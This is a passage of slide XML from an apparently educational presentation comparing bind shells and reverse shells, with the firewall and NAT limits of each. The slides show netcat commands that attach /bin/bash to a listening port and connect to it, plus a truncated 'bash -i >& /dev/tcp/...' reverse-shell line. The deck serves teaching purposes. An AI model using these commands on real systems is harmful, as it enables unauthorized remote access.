                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>TARGET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778240" y="2286000"/>
            <a:ext cx="2468880" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nc -lvnp 4444 -e /bin/bash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778240" y="2688336"/>
            <a:ext cx="2377440" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>listening on 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3794760" y="2560320"/>
            <a:ext cx="4617720" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FF6B6B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3931920" y="3401568"/>
            <a:ext cx="4389120" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6B6B"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>inbound connection, usually blocked</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="4434840"/>
            <a:ext cx="5486400" cy="2103120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The target opens a port </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>and attaches a shell to it. You are the client.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Simple, and almost never works. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Anything with a firewall drops your inbound connection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>No NAT traversal. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>If the target is behind a home or corporate router, there is nothing to connect to.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="4434840"/>
            <a:ext cx="5212080" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>ON THE TARGET, THEN ON YOU</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="4773168"/>
            <a:ext cx="5239512" cy="1388047"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3953"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6547104" y="4910328"/>
            <a:ext cx="4946904" cy="1113727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1668"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t># target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1668"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nc -lvnp 4444 -e /bin/bash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1668"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1668"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t># attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1668"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nc -nv TARGET 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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05 / SHELLS</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Reverse shell: the target calls you</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42</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="11091672" cy="2697480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2373"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1828800"/>
            <a:ext cx="2743200" cy="1463040"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1975104"/>
            <a:ext cx="2286000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>ATTACKER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2286000"/>
            <a:ext cx="2377440" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nc -lvnp 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2688336"/>
            <a:ext cx="2377440" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>waiting on 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="1920240"/>
            <a:ext cx="777240" cy="1280160"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11765"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2A1140"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="2148840"/>
            <a:ext cx="777240" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>FIRE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WALL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>NAT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8549640" y="1828800"/>
            <a:ext cx="2743200" cy="1463040"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FF6B6B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778240" y="1975104"/>
            <a:ext cx="2286000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>TARGET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778240" y="2286000"/>
            <a:ext cx="2468880" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>bash -i &gt;&amp; /dev/tcp/...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8778240" y="2688336"/>
            <a:ext cx="2377440" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>dials home</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3794760" y="2560320"/>
            <a:ext cx="4617720" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="5EE28A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="triangle"/>
          </a:ln>
